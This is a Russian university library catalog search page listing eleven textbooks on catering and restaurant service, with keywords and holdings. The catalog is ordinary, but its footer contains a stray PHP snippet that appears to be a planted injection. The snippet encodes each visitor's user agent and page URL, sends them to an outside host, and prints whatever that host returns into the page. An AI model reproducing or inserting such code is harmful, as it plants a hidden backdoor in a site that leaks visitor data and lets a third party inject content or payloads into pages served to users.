Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

85 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ПИТАНИЕ ИНТУРИСТОВ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 11
1. 
Радченко Л. А. Организация производства и обслуживания на предприятиях общественного питания [Текст] / Л. А. Радченко, 2013. - 321 с.
Ключевые слова 
МЕНЮ -- ДОКУМЕНТАЦИЯ -- ОРГАНИЗАЦИЯ ТРУДА рациональная -- Нормирование труда -- РАБОЧЕЕ МЕСТО -- Цех овощной -- Цех мясной -- Цех рыбный -- Цех мясо-рыбный -- Цех доработки полуфабрикатов -- Цех обработки зелени -- Цех горячий -- Цех холодный -- Цех кондитерский -- Моечная кухонной посуды -- Бракераж -- Хлеборезка -- Срок хранения продуктов -- ПОМЕЩЕНИЕ ТОРГОВОЕ -- ПРИБОР СТОЛОВЫЙ -- БЕЛЬЕ СТОЛОВОЕ -- КАРТА ВИН -- РЕСТОРАН - ОБСУЖИВАНИЕ -- БАНКЕТ С ЧАСТИЧНЫМ ОБСЛУЖИВАНИЕМ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- БАНКЕТ - ЧАЙ -- СТОЛ ШВЕДСКИЙ -- ПИТАНИЕ ИНТУРИСТОВ -- ПИТАНИЕ СОЦИАЛЬНОЕ -- ПИТАНИЕ СТУДЕНТОВ -- ПИТАНИЕ УЧАЩИХСЯ -- ПИТАНИЕ РАБОЧИХ
Держатели документа (Информация об экземплярах) 
2. 
Радченко Л. А. Обслуживание на предприятиях общественного питания [Текст] / Л. А. Радченко, 2013. - 318 с.
Держатели документа (Информация об экземплярах) 
3. 
Могильный М. П. Технология продукции общественного питания [Текст] / М. П. Могильный, Т. Ш. Шалтумаев, Т. В. Шленская, 2013. - 430 с.

В учебном пособии рассмотрена нормативная, техническая и технологическая документация, действующая в общественном питании; научные основы технологических процессов производства продукции общественного питания; технологические процессы обработки сырья, полуфабрикатов и готовой продукции; оценка качества продукции; современные подходы к разработке и производству продукции общественного питания. Особое внимание уделено технологическим характеристикам продукции, процессам, протекающим в продуктах при производстве, их влиянию на конечное качество. В приложении имеются извлечения из ГОСТов, СанПиН, а также указаны особенности организации питания зарубежных гостей.

Учебное пособие предназначено для студентов высших учебных заведений, обучающихся по направлению бакалавров "Технология продукции и организация общественного питания", специалистов, практических работников, слушателей системы повышения квалификации общественного питания, аспирантов, магистров.

4. 
Козлова С. Н. Кулинарная характеристика блюд [Текст] / С. Н. Козлова, Е. Ю. Фединишина, 2014. - 191 с.
Ключевые слова 
ОБРАБОТКА СЫРЬЯ КУЛИНАРНАЯ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА НЕРЫБНОГО ВОДНОГО СЫРЬЯ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА КРОЛИКА -- ПОЛУФАБРИКАТЫ -- СУП -- СОУС -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ РЫБЫ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ ДИЧИ -- БЛЮДА ИЗ КРОЛИКА -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКИ -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- ИЗДЕЛИЯ МУЧНЫЕ -- БЛЮДА ЛЕЧЕБНОГО ПИТАНИЯ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА НАЦИОНАЛЬНОЙ КУХНИ -- КУХНЯ НАЦИОНАЛЬНАЯ -- ПИТАНИЕ ИНТУРИСТОВ -- БЛЮДА ЗАРУБЕЖНОЙ КУХНИ -- КУХНЯ ЗАРУБЕЖНАЯ
Держатели документа (Информация об экземплярах) 
5. 
Радченко Л. А. Обслуживание на предприятиях общественного питания [Текст] : учеб. пособие для студентов образоват. учреждений сред. проф. образования / Л. А. Радченко, 2010. - 318 с.
Держатели документа (Информация об экземплярах) 
6. 
Обслуживание на предприятиях общественного питания [Текст] : учеб. пособие для колледжей и проф.-техн. лицеев, уч-щ / сост. Л. А. Радченко, 2001. - 372 с.
7. 
Радченко Л. А. Обслуживание на предприятиях общественного питания [Текст] : Учеб. пособие для колледжей, проф. уч-щ и лицеев / Л. А. Радченко, 2003. - 372 с.
Держатели документа (Информация об экземплярах) 
8. 
Могильный М. П. Организация и технология обслуживания питанием в гостиничных комплексах (рекомендации, перспективы, проектирование) [Текст] : производственно-практическое издание / М. П. Могильный, А. Ю. Баласанян, 2004. - 176 с.
Ключевые слова 
БАД -- ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА -- ХОЗЯЙСТВО ГОСТИНИЧНОЕ -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- СЕРВИС -- VIP - обслуживание -- МЕНЮ -- ТУРИЗМ молодежный -- ОБСЛУЖИВАНИЕ ИНТУРИСТОВ -- ПИТАНИЕ ИНТУРИСТОВ -- КУХНЯ АНГЛИЙСКАЯ -- КУХНЯ АМЕРИКАНСКАЯ -- КУХНЯ БОЛГАРСКАЯ -- КУХНЯ ВЕНГЕРСКАЯ -- КУХНЯ ИТАЛЬЯНСКАЯ -- КУХНЯ ИНДИЙСКАЯ -- КУХНЯ КОРЕЙСКАЯ -- КУХНЯ МЕКСИКАНСКАЯ -- КУХНЯ МОНГОЛЬСКАЯ -- КУХНЯ НЕМЕЦКАЯ -- КУХНЯ ПОЛЬСКАЯ -- КУХНЯ РУМЫНСКАЯ -- КУХНЯ ФРАНЦУЗСКАЯ -- КУХНЯ ЧЕШСКАЯ -- КУХНЯ СЛОВАЦКАЯ -- КУХНЯ ЮГОСЛАВСКАЯ -- КУХНЯ ЯПОНСКАЯ -- Кухня арабская -- Кухня Юго-Восточной Азии -- Кухня кубинская -- Кухня стран Латинской Америки -- ПИТАНИЕ ДИЕТИЧЕСКОЕ -- КУХНЯ НАЦИОНАЛЬНАЯ -- День разгрузочный
Держатели документа (Информация об экземплярах) 
9. 
Усов В. В. Организация производства и обслуживания на предприятиях общественного питания [Текст] : учеб. для образоват. учреждений нач. проф. образования / В. В. Усов, 2006. - 415 с.
Ключевые слова 
РЕСТОРАН -- ЦЕХ заготовочный -- ПОСУДА кухонная -- ХОЗЯЙСТВО складское -- ЦЕХ ДОРАБОТКИ ПОЛУФАБРИКАТОВ -- ЦЕХ специализированный -- ПОСУДА СТОЛОВАЯ -- БРАКЕРАЖ -- СТОЛОВАЯ -- БУФЕТ -- ИНТЕРЬЕР ресторана -- МОЕЧНАЯ столовой ПОСУДЫ -- БАР -- Сервизная -- Машина контрольно-кассовая -- Бельевая -- Гладильная -- ПРИБОР СТОЛОВЫЙ -- Белье столовое -- МЕТРДОТЕЛЬ -- ОФИЦИАНТ -- СЕРВИРОВКА -- МЕНЮ -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- Вино -- Аперитив -- Сомелье -- КУЛЬТУРА обслуживания -- ЭТИКЕТ СТОЛОВЫЙ -- СТОЛ ШВЕДСКИЙ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - ЧАЙ -- Банкет - коктейль -- БАНКЕТ свадебный -- ПРИЕМ -- ПИТАНИЕ интуристов -- СПРОС ПОТРЕБИТЕЛЬСКИЙ -- РЕКЛАМА - Ресторан -- УСЛУГИ ресторанные -- ОХРАНА ТРУДА -- БЕЗОПАСНОСТЬ ПОЖАРНАЯ
Держатели документа (Информация об экземплярах) 
10. 
Усов В. В. Организация производства и обслуживания на предприятиях общественного питания [Текст] : учеб. пособие для образоват. учреждений нач. проф. образования / В. В. Усов, 2007. - 415 с.
Ключевые слова 
РЕСТОРАН -- ЦЕХ заготовочный -- ПОСУДА кухонная -- ХОЗЯЙСТВО складское -- ЦЕХ ДОРАБОТКИ ПОЛУФАБРИКАТОВ -- ЦЕХ специализированный -- ПОСУДА СТОЛОВАЯ -- БРАКЕРАЖ -- СТОЛОВАЯ -- БУФЕТ -- ИНТЕРЬЕР ресторана -- МОЕЧНАЯ столовой ПОСУДЫ -- БАР -- Сервизная -- Машина контрольно-кассовая -- Бельевая -- Гладильная -- ПРИБОР СТОЛОВЫЙ -- Белье столовое -- МЕТРДОТЕЛЬ -- ОФИЦИАНТ -- СЕРВИРОВКА -- МЕНЮ -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- Вино -- Аперитив -- Сомелье -- КУЛЬТУРА обслуживания -- ЭТИКЕТ СТОЛОВЫЙ -- СТОЛ ШВЕДСКИЙ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - ЧАЙ -- Банкет - коктейль -- БАНКЕТ свадебный -- ПРИЕМ -- ПИТАНИЕ интуристов -- СПРОС ПОТРЕБИТЕЛЬСКИЙ -- РЕКЛАМА - Ресторан -- УСЛУГИ ресторанные -- ОХРАНА ТРУДА -- БЕЗОПАСНОСТЬ ПОЖАРНАЯ
Держатели документа (Информация об экземплярах) 
11. 
Усов В. В. Организация производства и обслуживания на предприятиях общественного питания [Текст] : Учеб. / В. В. Усов, 2002. - 415 с.
Ключевые слова 
РЕСТОРАН -- ЦЕХ заготовочный -- ПОСУДА кухонная -- ХОЗЯЙСТВО складское -- ЦЕХ ДОРАБОТКИ ПОЛУФАБРИКАТОВ -- ЦЕХ специализированный -- ПОСУДА СТОЛОВАЯ -- БРАКЕРАЖ -- СТОЛОВАЯ -- БУФЕТ -- ИНТЕРЬЕР ресторана -- МОЕЧНАЯ столовой ПОСУДЫ -- БАР -- Сервизная -- машина контрольно-кассовая -- Бельевая -- Гладильная -- ПРИБОР СТОЛОВЫЙ -- Белье столовое -- МЕТРДОТЕЛЬ -- ОФИЦИАНТ -- СЕРВИРОВКА -- МЕНЮ -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- Вино -- Аперитив -- Сомелье -- КУЛЬТУРА обслуживания -- ЭТИКЕТ СТОЛОВЫЙ -- СТОЛ ШВЕДСКИЙ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - ЧАЙ -- Банкет - коктейль -- БАНКЕТ свадебный -- ПРИЕМ -- ПИТАНИЕ интуристов -- СПРОС ПОТРЕБИТЕЛЬСКИЙ -- РЕКЛАМА - Ресторан -- УСЛУГИ ресторанные -- ОХРАНА ТРУДА -- БЕЗОПАСНОСТЬ ПОЖАРНАЯ
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3022 - 18.09.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.94 с.12 запросов, 0.33c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;